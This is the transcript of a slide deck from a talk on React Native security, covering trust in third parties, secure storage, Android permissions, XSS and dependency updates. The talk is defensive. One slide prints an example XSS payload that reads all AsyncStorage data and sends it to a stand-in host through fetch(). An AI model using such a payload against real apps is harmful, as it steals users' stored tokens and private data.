Upgrade to Pro — share decks privately, control downloads, hide ads and more …

React Native Security

Julia Mezher
December 05, 2020

React Native Security

Julia Mezher

December 05, 2020
Tweet

More Decks by Julia Mezher

Other Decks in Technology

Transcript

  1. About me Security Software Engineer at Cossack Labs We help

    companies to protect their sensitive and valuable data. @julepka
  2. “Choosing React Native and its components means that you understand

    and accept potential security consequences.”
  3. Architecture basics React Native is a cross-platform solution from Facebook

    that allows writing native apps using React (JavaScript or TypeScript).
  4. Trusting third parties Apple and Google are must haves. Add

    Facebook to the list. CVE-2020-1911 CVE-2020-1912 CVE-2020-1913
  5. “Working with React Native developers deal with security for all

    three platforms: iOS, Android and React Native.”
  6. Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data

    stored encrypted Yes Yes Data persists across app reinstalls Yes No Hardware-backed encryption Yes Depends on device vendor Data decrypted only before usage Decrypted when device unlocked Yes
  7. Managing Android Permissions Android: You can add permissions in multiple

    files + React Navite: It is common practice to use third-party solutions
  8. Managing Android Permissions Android: You can add permissions in multiple

    files + React Navite: It is common practice to use third-party solutions =
  9. Managing Android Permissions Android: You can add permissions in multiple

    files + React Native: It is common practice to use third-party solutions = I don’t need this permission The app crashes if I delete it
  10. Is XSS possible? XSS possibility is decreases by design. XSS

    is still possible. eval() _reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result) {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});}); Steal all the data from local storage (AsyncStorage) by exploiting eval-based injection and accessing React Native APIs
  11. Apart from Source Code Annual BIS Reports US encryption export

    regulations Apple privacy rules User acknowledgement about private data usage
  12. Monitoring dependencies So many dependencies Additional CI work One update

    triggers another update Integrating dependency checkers Updates may be incompatible What if there is no fix for vulnerability?
  13. ✅ Learn more about the issue, its scope ✅ Document

    it, make the team aware ✅ Monitor it and book the time for the update What if there is no fix?
  14. ✅ Learn more about the issue, its scope ✅ Document

    it, make the team aware ✅ Monitor it and book the time for the update What if there is no fix? React Native requires team to plan time more carefully
  15. React Native requires team to plan time more carefully ➡

    iOS or Android update ➡ React Native update ➡ Forked version update ➡ Dependencies update ➡ Mobile app source code update